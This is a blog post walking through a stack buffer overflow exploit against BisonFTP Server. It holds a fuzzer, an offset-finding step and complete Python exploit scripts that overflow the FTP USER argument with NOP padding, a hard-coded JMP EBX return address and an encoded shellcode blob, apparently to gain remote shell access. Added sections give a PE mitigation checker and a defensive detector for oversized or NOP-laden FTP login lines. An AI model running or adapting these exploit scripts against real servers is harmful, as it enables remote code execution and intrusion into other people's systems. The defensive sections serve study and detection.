Tuesday, October 09, 2012

Buffer Overflow Exploit: BisonFTP Server

First, write a simple fuzzer to make the application crash.

#!/usr/bin/python
import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                    # read the FTP banner
time.sleep(4)
buffer = "\x41" * 1500                 # 1500 x 'A'
print("sending ... ")
s.send(buffer + '\r\n')                # Python 2: str is bytes, so this sends raw bytes
data = s.recv(1024)
print("Finish")
s.close()


Then run it again with the server attached to OllyDbg.



We can see that EIP and EBX were overwritten by our fuzzer.
Next step: find the offset. First create a 1500-byte pattern and copy it into the fuzzer.



#!/usr/bin/python
import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                    # read the FTP banner
time.sleep(4)
# 1500-byte cyclic pattern (pattern_create output), every 4-byte window is unique
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
print("sending ... ")
s.send('USER ' + buffer + '\r\n')      # the pattern goes in as the USER argument
data = s.recv(1024)
print("Finish")
s.close()


Then look up the offset of the value that landed in EIP within the pattern.
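How that offset is found, as an added example that is not from the original post: the pattern pasted into the script above is the cyclic pattern that Metasploit's pattern_create emits, and the offset is simply the position of the four bytes that land in EIP. The post's screenshots are not reproduced here, so the EIP value 0x6A42346A below is a constructed one, chosen to agree with the 1063 bytes of padding the later scripts use.

```python
# Added example (not from the original post): generate the "Aa0Aa1..." cyclic
# pattern used above and map a 4-byte register value back to its offset.
import string
import struct


def pattern_create(length):
    """Return a cyclic pattern of `length` characters.

    Triplets are upper+lower+digit, so every 4-byte window is unique
    within the first 26*26*10*3 = 20280 characters and a value read from
    a register maps back to exactly one position."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, value):
    """Locate a 4-byte value in the pattern; -1 if it is not present.

    `value` may be the characters as they sit in memory ("j4Bj") or the
    integer a debugger shows in EIP (0x6A42346A); an x86 register is
    little-endian, so the integer is repacked into memory order first."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    return pattern.find(value)


if __name__ == "__main__":
    p = pattern_create(1500)
    print(p[:30], "...", p[-12:])
    # constructed EIP value consistent with the 1063-byte offset in the post
    print("offset for EIP 0x6A42346A:", pattern_offset(p, 0x6A42346A))
```

The first 1500 characters produced here match the pattern in the script above byte for byte, which is the check worth doing before trusting an offset computed this way.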



Next step: control EIP.



Search the loaded modules for a jmp ebx. Why do we need to jump to EBX? Because our buffer (the AAAA bytes) was placed in EBX; when the jmp ebx instruction executes, control is transferred to EBX and our payload starts executing.
First search the modules. Here I try the module shell32.dll.


Then search for the jmp ebx: press Ctrl+F and type jmp ebx.


And we get the address.
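The reason a fixed address like 7CB1E88F can be hard-coded at all is that the module loads at the same base on every run, which is what a DLL opts out of by not setting DYNAMIC_BASE (ASLR) in its PE header. As an added example that is not from the original post, this reads the DllCharacteristics field of a PE image and reports the mitigations a module opts into; the fake_pe fixture is a constructed minimal PE32 header, and running the script with a path reads a real DLL instead.

```python
# Added example (not from the original post): audit a PE image for the
# DllCharacteristics flags that decide whether a hard-coded gadget address
# in that module would be stable (no DYNAMIC_BASE) and whether injected
# bytes on the stack would be executable (no NX_COMPAT).
import struct
import sys

IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000


def dll_characteristics(data):
    """Return the DllCharacteristics word of the PE image held in `data`.

    Walk: DOS header ("MZ", e_lfanew at 0x3C) -> "PE\\0\\0" -> 20-byte COFF
    header -> optional header, where DllCharacteristics sits at offset 70
    for both PE32 (magic 0x10B) and PE32+ (magic 0x20B)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)   # SizeOfOptionalHeader
    if opt_size < 72:
        raise ValueError("optional header too short")
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (chars,) = struct.unpack_from("<H", data, opt + 70)
    return chars


def mitigation_report(data):
    """Summarise which mitigations the module opts into."""
    chars = dll_characteristics(data)
    return {
        "aslr": bool(chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "cfg": bool(chars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def fake_pe(dll_characteristics_value):
    """Constructed minimal PE32 header used as a test fixture (not a real DLL).

    The optional header is truncated to 96 bytes; a real PE32 one is 224."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew: PE header follows DOS header
    # Machine=i386, 1 section, timestamp/symbols 0, SizeOfOptionalHeader=96, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96, 0x2102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics_value)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(mitigation_report(f.read()))
    else:
        print("legacy  :", mitigation_report(fake_pe(0x0000)))   # every flag clear
        print("hardened:", mitigation_report(fake_pe(0x0140)))   # DYNAMIC_BASE | NX_COMPAT
```

A module whose report shows aslr False is one whose addresses survive reboots, so a single fixed jmp ebx works against every installation with the same binary; that is the property to check when deciding whether an old system library is still acceptable next to a network-facing service.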



Next step: build the payload.

#!/usr/bin/python
import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 1063                 # padding up to the saved return address (offset 1063)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                    # read the FTP banner
time.sleep(4)
buffer += "\x8F\xE8\xB1\x7C"           # 7CB1E88F  FFE3  JMP EBX (shell32.dll), little-endian
payload=("\xdd\xc0\xba\xbc\x07\x7b\xdf\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x51"
"\x31\x56\x17\x83\xee\xfc\x03\xea\x14\x99\x2a\xee\x71\xb6\x98\xe6"
"\x7f\xb7\xdc\x09\x1f\xc3\x4f\xd1\xc4\x58\xca\x25\x8e\x23\xd0\x2d"
"\x91\x34\x51\x82\x89\x41\x39\x3c\xab\xbe\x8f\xb7\x9f\xcb\x11\x29"
"\xee\x0b\x88\x19\x95\x4c\xdf\x66\x57\x86\x2d\x69\x95\xfc\xda\x52"
"\x4d\x27\x0b\xd1\x88\xac\x14\x3d\x52\x58\xcc\xb6\x58\xd5\x9a\x97"
"\x7c\xe8\x77\x24\x51\x61\x0e\x46\x8d\x69\x70\x55\xfc\x4a\x16\xd2"
"\xbc\x5c\x5c\xa4\x4e\x16\x12\x38\xe2\xa3\x93\x48\xa2\xdb\x9d\x06"
"\x54\xf0\xf2\x69\xbe\x6e\xa0\xf3\x57\x5c\x74\x93\xd0\xd1\x4a\x3c"
"\x4b\xe9\x7b\xaa\xb8\xf8\x80\x11\x6f\xfc\xaf\x3a\x06\xe7\x36\x45"
"\xf5\xe0\xb4\x10\x6c\xf3\x47\x4a\x18\x2a\xbe\x9f\x74\x9b\x3e\x89"
"\xd4\x77\x92\x66\x88\x34\x47\xcb\x7d\x44\xb7\xad\xe9\xab\x64\x57"
"\xb9\x42\x75\x02\x55\xf1\x6c\x5c\x61\xae\x6f\x4a\x07\x41\xc1\x27"
"\x27\xb1\x89\x63\x7a\x1c\xa3\x3c\x7a\xb7\x60\x97\x7b\xe8\xef\xf2"
"\xcd\x8f\xb9\xab\x32\x59\x69\x07\x99\x33\x75\x77\xb2\xd4\x6e\x0e"
"\x73\x5d\x26\x0f\xad\xcb\x37\x3f\x34\x9e\xa3\xd9\xd1\x3d\x41\xac"
"\xc7\xa8\xc9\xf7\x2e\xe1\x63\xe0\x5b\xbd\xfa\x0c\xaa\xfd\x0e\x7a"
"\x33\xbf\xdd\x84\x8e\x6c\x8d\xf5\x75\x55\x1a\xae\x21\xcd\x2e\x4e"
"\x86\x18\x30\xdb\xad\xdb\x18\x78\x79\x76\xf4\x2f\xd4\x1c\xf7\x9e"
"\x87\xb5\xa6\xdf\xf8\x5e\xe4\xc6\xfc\x50\xa5\x07\x28\x06\xb5\x08"
"\xe2\x28\x99\x7d\x5a\x2b\x99\x45\x01\x2c\x48\x17\x35\x02\x1d\xe9"
"\x11\x41\xad\x46\x5d\x50\xad\xb8")
#buffer += "\xCC" * (1500 - len(buffer))   # optional INT3 filler, left disabled
print("sending ... ")
s.send('USER ' + buffer + payload + '\r\n')   # Python 2: str is bytes, so this sends raw bytes
data = s.recv(1024)
print("Finish")
s.close()


And I try running it without OllyDbg.


But I can't access the system using telnet, so I run it again under OllyDbg and get this result:


Here we can see that our payload does not land fully, so we would have to use an egghunter.

But first I try changing the module. Here I use msvcrt.dll. My guess is that the previous module's address could not lead to executing our payload (that's my opinion).



#!/usr/bin/python
import socket
import time

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('192.168.56.101', 21))
data = s.recv(1024)                    # read the FTP banner
time.sleep(4)

buffer = "\x90" * 1063                 # padding up to the saved return address (offset 1063)
#buffer += "\x8F\xE8\xB1\x7C"          # 7CB1E88F  FFE3  JMP EBX (shell32.dll), first attempt, disabled
buffer += "\x13\x1F\xC1\x77"           # 77C11F13  JMP EBX in msvcrt.dll, little-endian
buffer += "\x90" * 16                  # short NOP sled in front of the shellcode
payload=("\xdd\xc0\xba\xbc\x07\x7b\xdf\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x51"
"\x31\x56\x17\x83\xee\xfc\x03\xea\x14\x99\x2a\xee\x71\xb6\x98\xe6"
"\x7f\xb7\xdc\x09\x1f\xc3\x4f\xd1\xc4\x58\xca\x25\x8e\x23\xd0\x2d"
"\x91\x34\x51\x82\x89\x41\x39\x3c\xab\xbe\x8f\xb7\x9f\xcb\x11\x29"
"\xee\x0b\x88\x19\x95\x4c\xdf\x66\x57\x86\x2d\x69\x95\xfc\xda\x52"
"\x4d\x27\x0b\xd1\x88\xac\x14\x3d\x52\x58\xcc\xb6\x58\xd5\x9a\x97"
"\x7c\xe8\x77\x24\x51\x61\x0e\x46\x8d\x69\x70\x55\xfc\x4a\x16\xd2"
"\xbc\x5c\x5c\xa4\x4e\x16\x12\x38\xe2\xa3\x93\x48\xa2\xdb\x9d\x06"
"\x54\xf0\xf2\x69\xbe\x6e\xa0\xf3\x57\x5c\x74\x93\xd0\xd1\x4a\x3c"
"\x4b\xe9\x7b\xaa\xb8\xf8\x80\x11\x6f\xfc\xaf\x3a\x06\xe7\x36\x45"
"\xf5\xe0\xb4\x10\x6c\xf3\x47\x4a\x18\x2a\xbe\x9f\x74\x9b\x3e\x89"
"\xd4\x77\x92\x66\x88\x34\x47\xcb\x7d\x44\xb7\xad\xe9\xab\x64\x57"
"\xb9\x42\x75\x02\x55\xf1\x6c\x5c\x61\xae\x6f\x4a\x07\x41\xc1\x27"
"\x27\xb1\x89\x63\x7a\x1c\xa3\x3c\x7a\xb7\x60\x97\x7b\xe8\xef\xf2"
"\xcd\x8f\xb9\xab\x32\x59\x69\x07\x99\x33\x75\x77\xb2\xd4\x6e\x0e"
"\x73\x5d\x26\x0f\xad\xcb\x37\x3f\x34\x9e\xa3\xd9\xd1\x3d\x41\xac"
"\xc7\xa8\xc9\xf7\x2e\xe1\x63\xe0\x5b\xbd\xfa\x0c\xaa\xfd\x0e\x7a"
"\x33\xbf\xdd\x84\x8e\x6c\x8d\xf5\x75\x55\x1a\xae\x21\xcd\x2e\x4e"
"\x86\x18\x30\xdb\xad\xdb\x18\x78\x79\x76\xf4\x2f\xd4\x1c\xf7\x9e"
"\x87\xb5\xa6\xdf\xf8\x5e\xe4\xc6\xfc\x50\xa5\x07\x28\x06\xb5\x08"
"\xe2\x28\x99\x7d\x5a\x2b\x99\x45\x01\x2c\x48\x17\x35\x02\x1d\xe9"
"\x11\x41\xad\x46\x5d\x50\xad\xb8")
#buffer += "\xCC" * (1500 - len(buffer))   # optional INT3 filler, left disabled
print("sending ... ")
s.send('USER ' + buffer + payload + '\r\n')   # Python 2: str is bytes, so this sends raw bytes
data = s.recv(1024)
print("Finish")
s.close()

And I get this result....


Alhamdulillah.... :D
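Seen from the server side, the crash input from the first fuzzer and the final payload share one shape on the wire: a USER argument far longer than any real username, a long run of 0x90 bytes, and non-printable bytes where ASCII is expected. As an added example that is not from the original post, this is a small detector for that shape run over constructed FTP control-channel lines; the thresholds MAX_ARG_LEN and NOP_RUN_MIN are assumptions to tune per deployment.

```python
# Added example (not from the original post): flag FTP USER/PASS lines whose
# argument is oversized, contains non-printable bytes, or carries a NOP sled.
import re

MAX_ARG_LEN = 256          # assumed generous upper bound for a real username/password
NOP_RUN_MIN = 32           # assumed: 32+ consecutive 0x90 bytes is a sled, not a name
NOP_RUN = re.compile(rb"\x90{%d,}" % NOP_RUN_MIN)


def inspect_ftp_line(line):
    """Return a list of findings for one raw FTP command line (bytes)."""
    findings = []
    line = line.rstrip(b"\r\n")
    cmd, _, arg = line.partition(b" ")
    cmd = cmd.upper()
    if cmd not in (b"USER", b"PASS"):
        return findings                       # only credential commands are inspected here
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized %s argument (%d bytes)" % (cmd.decode(), len(arg)))
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if non_printable:
        findings.append("%d non-printable bytes in %s argument" % (non_printable, cmd.decode()))
    m = NOP_RUN.search(arg)
    if m:
        findings.append("NOP sled of %d bytes at offset %d" % (len(m.group()), m.start()))
    return findings


def scan(lines):
    """Map line index -> findings, omitting clean lines."""
    result = {}
    for i, line in enumerate(lines):
        findings = inspect_ftp_line(line)
        if findings:
            result[i] = findings
    return result


# Constructed sample traffic: a normal login, the 1500-byte crash input from
# the first fuzzer, and a payload-shaped line (sled plus a few junk bytes).
SAMPLE_LINES = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"A" * 1500 + b"\r\n",
    b"USER " + b"\x90" * 1079 + b"\x01\x02\x03\x04\x05" + b"\r\n",
    b"LIST\r\n",
]

if __name__ == "__main__":
    for idx, findings in sorted(scan(SAMPLE_LINES).items()):
        print("line %d:" % idx)
        for f in findings:
            print("   ", f)
```

The oversized-argument rule alone would have caught the very first fuzzer run, before any shellcode was involved, which is why a length limit on the argument at the parser (and an alert on it at the network) is the cheap fix for this class of bug.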

1 comment:

  1. Do you have the software available for download? Can you provide a link please?
